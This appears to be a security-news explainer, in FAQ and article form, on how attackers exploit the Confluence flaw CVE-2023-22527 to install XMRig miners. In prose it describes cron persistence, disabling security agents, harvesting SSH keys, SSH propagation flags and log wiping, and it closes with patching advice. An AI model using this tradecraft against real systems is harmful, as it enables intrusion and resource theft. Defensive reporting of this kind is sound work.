How do attackers exploit CVE-2023-22527?

Attackers exploit CVE-2023-22527 by executing remote code on affected Confluence instances without needing authentication. They abuse the template injection vulnerability to gain access, then deploy malicious scripts and tools, including the XMRig miner, to mine cryptocurrency using the compromised system's resources.

What tools do attackers deploy after exploiting CVE-2023-22527?

Once inside the compromised system, attackers deploy tools such as the XMRig miner for cryptomining. They also use malicious scripts to kill competing mining processes, disable security defenses, gather system information, and spread the mining script to other hosts.

How do attackers maintain persistence on compromised systems?

Attackers maintain persistence by setting up cron jobs that reconnect to their command-and-control (C&C) server every five minutes. They replace existing cron jobs with new ones to ensure continuous control over the compromised systems, even if mining processes are stopped.

How do attackers spread the mining script to other hosts?

Attackers spread the mining script to other hosts by using SSH commands with options that disable host key verification and password prompts, allowing rapid propagation across available systems. They use information gathered from the compromised system, such as IP addresses and SSH keys, to connect to other hosts.

What final steps do attackers take before initiating cryptomining?

Before starting cryptomining operations, attackers perform a final cleanup by disabling any remaining security tools that could disrupt the mining process. They then initiate the XMRig miner and clear log files and bash histories to cover their tracks and make detection difficult.

Knowledge

Detailed process - how hackers exploit Atlassian CVE-2023-22527

Q: What should organizations do to mitigate the risk of CVE-2023-22527?

Organizations should update their Confluence instances to the latest versions to patch CVE-2023-22527. They should also implement security best practices, such as regular patching, network segmentation, conducting security audits, and maintaining an effective incident response plan to defend against such exploit attempts.

published: Aug. 28, 2024

Take action: How hackers exploit a flaw, step by step.

Learn More

CVE-2023-22527 is a critical vulnerability affecting Atlassian Confluence Data Center and Confluence Server, versions 8.0.x through 8.5.3. The vulnerability involves a template injection flaw that allows unauthenticated attackers to execute remote code on vulnerable systems.

Threat actors have been exploiting this vulnerability to transform compromised environments into cryptomining networks. This article explains the exploit process - step by step.

Exploitation Begins: The Initial Access

Attackers begin their exploitation by taking advantage of the CVE-2023-22527 vulnerability. This flaw allows them to execute code remotely on the affected Confluence instances without needing authentication. By abusing the template injection vulnerability, the attackers gain an entry point into the system, enabling them to deploy various malicious scripts that set the stage for cryptomining activities.

Deploying Malicious Scripts and Tools

Once inside, the attackers deploy specific malicious scripts and tools. One of the primary tools used in these attacks is the XMRig miner, a popular software for cryptomining that leverages the processing power of compromised systems to mine cryptocurrency. The attackers drop these miners onto the servers using payloads, often delivered through executable and linkable format (ELF) files.

Killing Competitors

The malicious scripts actively seek out and kill any competing cryptomining processes running on the system. By terminating these rival processes, the attackers ensure that their own mining operations can run at maximum efficiency without competition.

Maintaining Persistence via Cron Job Scheduling

To maintain long-term control over the compromised systems, attackers rely on cron jobs, which are scheduled tasks that run at specified intervals. The scripts delete existing cron jobs and replace them with new ones that reconnect to the command-and-control (C&C) server every five minutes. This ensures that even if the mining process is stopped, it will automatically restart shortly after.

Disabling Security Defenses

The attackers take measures to neutralize security defenses that could interfere with their operations. The deployed script’s der function specifically targets and uninstalls security services such as Alibaba Cloud Shield and Tencent Cloud mirrors. These actions are meant to reduce the chance of detection and interruption by cloud security tools.

Gathering Information for Further Spread

Another step involves the localgo function of the script, which gathers sensitive information from the compromised system. This function identifies the machine's IP address, user accounts, and SSH keys by scanning the user’s bash history, SSH configurations, and known hosts files. The data collected allows the attackers to expand their cryptomining activities to other connected systems using automated SSH commands.

Spreading the Mining Script to Other Hosts

Using the information gathered, the attackers spread their mining activities to other hosts. This is accomplished using specific SSH commands that connect to remote systems without host key verification (oStrictHostKeyChecking=no), disable interactive password prompts (oBatchMode=yes), and set quick timeouts (oConnectTimeout=3). These settings ensure that the attack script can rapidly propagate across available hosts, embedding the mining payloads into each compromised machine.

Adding More Cron Jobs for Resilience

To further solidify their hold, the attackers add multiple cron jobs under different names (e.g., whoami, nginx, apache) in various system directories like init.d, cron.hourly, and cron.d. This redundancy ensures that even if some jobs are detected and removed, others remain to keep the mining activities operational.

Final Cleanup and Mining Commencement

Before fully initiating the cryptomining operations, the attackers perform a final cleanup. The solr.sh function is used to terminate any remaining security tools that could disrupt the mining process. Once the cleanup is complete, the attackers start the XMRig miner, exploiting the system's resources to mine cryptocurrency. To cover their tracks, they clear log files and bash histories, making it difficult for administrators to trace the attack back to its origin.

Continuous Exploitation and Risk

Since mid-June to the end of July 2024, there has been a noticeable surge in the exploitation attempts of CVE-2023-22527. Multiple threat actors have been observed deploying similar scripts, showing how this vulnerability is being actively used for cryptomining on a global scale.

Mitigation and Prevention

Organizations are advised to update their Confluence instances to the latest versions to close this critical vulnerability. Implementing security best practices such as regular patching, network segmentation, conducting security audits, and maintaining an effective incident response plan is crucial in defending against such exploit attempts.

Detailed process - how hackers exploit Atlassian CVE-2023-22527

Read More
State of (in)security - Week 29, 2025
State of (in)security - Week 22, 2025
Blind Eagle gang targets Colombian Institutions
State of (in)security - Week 47, 2024
State of (in)security - Week 8, 2025